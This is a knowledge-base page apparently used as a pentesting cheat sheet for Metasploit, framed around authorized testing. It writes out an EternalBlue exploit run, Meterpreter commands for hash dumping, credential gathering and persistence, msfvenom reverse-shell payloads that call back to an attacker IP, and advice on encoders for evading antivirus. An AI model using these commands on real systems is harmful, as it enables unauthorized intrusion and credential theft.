Mnemata / @sanoski / Hacking Tools (public knowledge base: a collection of hacking tools)

Metasploit

Overview

Metasploit Framework is the world’s most widely used penetration testing platform. It provides a massive library of exploits, payloads, auxiliary modules, and post-exploitation tools in a unified CLI/GUI environment. It is the backbone of professional pentesting and CTF work.

Category

#exploitation #gaining-access #post-exploitation

Phase

Gaining Access

Developer

Originally HD Moore; now maintained by Rapid7 — metasploit.com

Editions

| Edition | Notes |
| --- | --- |
| Metasploit Framework | Free, open-source, CLI-based |
| Metasploit Pro | Commercial; adds web UI, automation, reports |

Install

# Kali Linux — pre-installed
msfconsole

# Other Linux
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall && sudo ./msfinstall

Core Concepts

| Term | Description |
| --- | --- |
| Module | Any piece of functionality (exploit, auxiliary, payload, etc.) |
| Exploit | Code that takes advantage of a vulnerability |
| Payload | Code that runs on the target after exploitation |
| Auxiliary | Scanners, fuzzers, DoS, brute-force (no payload) |
| Post | Post-exploitation modules (run after access is gained) |
| Encoder | Obfuscates payloads to evade AV |
| Nop | No-operation sled used in some exploits |
| LHOST | Attacker IP (where reverse shells connect back to) |
| LPORT | Attacker listening port |
| RHOST | Remote/target host |

Payload Types

| Type | Behavior |
| --- | --- |
| singles | Self-contained; do one thing |
| stagers | Tiny stub that fetches the rest of the payload |
| stages | Full payload delivered by stager (e.g., Meterpreter) |
| bind | Opens a port on the target; attacker connects in |
| reverse | Target connects back to attacker (better for NAT/firewall) |

Common msfconsole Commands

msfconsole                    # Start Metasploit

# Searching and selecting modules
search eternalblue            # Find modules by keyword
search type:exploit ms17-010  # Filter by type + keyword
use exploit/windows/smb/ms17_010_eternalblue
info                          # Show module details

# Configure and run
show options                  # See required settings
set RHOSTS 192.168.1.10
set LHOST 192.168.1.100
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run                           # or: exploit

# Session management
sessions -l                   # List active sessions
sessions -i 1                 # Interact with session 1
background                    # Background current session

# Database (requires postgresql)
db_nmap -sV 192.168.1.0/24   # Run Nmap, save results to DB
hosts                         # View discovered hosts
services                      # View discovered services
vulns                         # View recorded vulnerabilities

Meterpreter Quick Reference

# System
sysinfo           # OS/hostname info
getuid            # Current user
getpid            # Current process ID
ps                # List processes
migrate 1234      # Migrate to process by PID

# Filesystem
ls                # List directory contents
pwd               # Print working directory
cd <dir>          # Change directory
download file.txt /local/path
upload /local/file.txt C:\\Windows\\Temp

# Privilege escalation
getsystem         # Attempt automatic privesc
run post/multi/recon/local_exploit_suggester

# Credentials
hashdump          # Dump local password hashes
run post/windows/gather/credentials/credential_collector

# Pivoting
portfwd add -l 4444 -p 3389 -r 10.10.10.5  # Port forward

# Persistence
run post/windows/manage/persistence_exe

MSFvenom — Payload Generation

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

# List all payloads
msfvenom -l payloads
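As an added example (not from these notes or the Metasploit project), the script below classifies payload names by the naming convention that the Payload Types table and the msfvenom commands above rely on: stage and stager as separate path components (`meterpreter/reverse_tcp`) means staged, an underscore joining them (`meterpreter_reverse_tcp`) means a stageless single, and the final component carries the bind/reverse direction and the transport. The stage-name and architecture sets are assumptions (partial lists sufficient for common payloads), and the sample names are constructed.

```python
# Added example: classify Metasploit payload names by the framework's naming
# convention.  Staged payloads keep stage and stager as separate path parts
# ("meterpreter/reverse_tcp"); stageless singles fuse them with an underscore
# ("meterpreter_reverse_tcp").  The last part also names direction and transport.
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Partial lists (assumption): enough for the common payloads, not exhaustive.
KNOWN_STAGES = {"meterpreter", "shell", "vncinject", "dllinject", "powershell", "custom"}
ARCHES = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "ppc"}
_LAST = re.compile(
    r"^(?:(?P<stage>[a-z0-9]+)_)?(?P<dir>reverse|bind)(?:_(?P<transport>[a-z0-9_]+))?$")

@dataclass(frozen=True)
class PayloadInfo:
    name: str
    platform: str             # first path part, e.g. "windows", "linux", "php"
    arch: Optional[str]       # "x64" etc. when present in the path, else None
    staged: bool              # True = stager + stage, False = single (stageless)
    direction: str            # "reverse", "bind" or "none" (e.g. windows/adduser)
    transport: Optional[str]  # "tcp", "https", "named_pipe", ... or None

def classify(name: str) -> PayloadInfo:
    parts = name.strip().split("/")
    platform = parts[0]
    arch = parts[1] if len(parts) > 2 and parts[1] in ARCHES else None
    m = _LAST.match(parts[-1])
    if m is None:  # no connection semantics in the name (exec, adduser, ...)
        return PayloadInfo(name, platform, arch, False, "none", None)
    # Staged only when a bare stager follows a stage that is its own path part.
    staged = m["stage"] is None and len(parts) >= 2 and parts[-2] in KNOWN_STAGES
    return PayloadInfo(name, platform, arch, staged, m["dir"], m["transport"])

def summarize(names) -> dict:
    """Count staged vs single and reverse vs bind vs none across a payload list."""
    counts = Counter()
    for info in map(classify, names):
        counts["staged" if info.staged else "single"] += 1
        counts[info.direction] += 1
    return dict(counts)

# Constructed sample: the payloads used in the notes above plus a connectionless one.
SAMPLE_NAMES = ["php/meterpreter_reverse_tcp", "windows/x64/meterpreter/reverse_tcp",
                "windows/shell_bind_tcp", "windows/adduser"]
```

Feeding the real `msfvenom -l payloads` names through `summarize` shows how the listing splits between staged and stageless variants of the same stage and transport.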

OPSEC Notes

Metasploit exploits generate significant network noise and host artifacts. Use staged payloads and encoders to reduce AV detection. Always operate inside authorized scope — unauthorized exploitation is illegal regardless of tool used.

Related Tools

  • Nmap / Nessus / OpenVAS — Identify targets and vulns before exploiting
  • Hydra — Brute-force credentials that can be used with Metasploit modules
  • Meterpreter — The primary post-exploitation shell (built into Metasploit)
  • SQLmap — Exploits SQL injection; can chain with Metasploit
  • Netcat — Lightweight alternative for simple reverse shells

Tags

#ethical-hacking #exploitation #gaining-access #post-exploitation #meterpreter
